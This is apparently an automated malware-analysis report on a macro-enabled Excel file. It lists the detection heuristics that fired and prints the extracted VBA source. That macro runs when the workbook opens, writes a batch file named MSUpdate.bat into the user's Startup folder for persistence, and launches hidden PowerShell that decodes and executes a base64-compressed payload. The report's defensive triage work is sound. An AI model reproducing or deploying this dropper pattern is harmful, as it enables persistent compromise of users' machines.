Verdict: MALICIOUS
Risk Score: 236
Heuristics: 7
| Heuristic | Severity | Rule ID | Description | Matched line in script |
|---|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project — VBA macros present (5 related findings) | |
| Potential Shell call in VBA | critical | OLE_VBA_SHELL | Potential Shell call in VBA | `Shell (Path)` |
| PowerShell reference in VBA | critical | OLE_VBA_PS | PowerShell reference in VBA | `str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"` |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below. | |
| Workbook_Open macro | low | OLE_VBA_WBOPEN | Workbook_Open macro | `Private Sub Workbook_Open()` |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) | `username = Environ$("UserName")` |
| Suspicious extracted artifact | high | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. | |
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5849 bytes | ee5fe7e3b9e5979f7cfbac3caf40ef7fa8b8cb8e9d8b7fa1f622ef475b01c929 |
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 88 of 155 identifiers look randomly generated (e.g. 'sXLFGtQURyIkKQhRDcBe3hJENrkMufQ3VxdjIt1l') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim str As String
Dim Command As String
Dim exec As String
Dim username As String
username = Environ$("UserName")
Dim Path As String
Path = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\MSUpdate.bat"
Set FS = New FileSystemObject
Dim stream As TextStream
' Create a TextStream.
Set stream = FS.CreateTextFile(Path, True)
str = ""
str = str + "@echo off"
stream.WriteLine str
str = ""
str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str = str + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str = str + "ect IO.Compression.DeflateStream ($(New-Object IO."
str = str + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "vVZ"
str = str + "dG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO.Compression.Compression"
str = str + "Mode]::Decompress)), [Text.Encoding]::ASCII)).Read"
str = str + "ToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\windowspowershe"
str = str + "ll\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec "
str = str + "Bypass -Command " + Chr(34) + "Invoke-Expression $(New-Object IO"
str = str + ".StreamReader ($(New-Object IO.Compression.Deflate"
str = str + "Stream ($(New-Object IO.MemoryStream (,$([Convert]"
str = str + "::FromBase64String(\" + Chr(34) + "vVZLj+M2DL7nVwiBDwnGHsiWX9lgg"
str = str + "XXOLgzwP3w0WW+8x0bro/AeddG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO"
str = str + ".Compression.CompressionMode]::Decompress)), [Text"
str = str + ".Encoding]::ASCII)).ReadToEnd();" + Chr(34) + ")"
stream.WriteLine str
str = ""
' Close the file.
stream.Close
Shell (Path)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 18944 bytes | c526b34a0a7ba52b9b278078bccc7f810cc7f4a5de0e34952150d14aef34f5c4 |
Detection
ClamAV: No threats found
Obfuscation or payload: likely. 221 of 423 identifiers look randomly generated (e.g. 'C3E9074B00FCD0FCDF03310CDC68D2522639816D') — consistent with name-mangling obfuscation.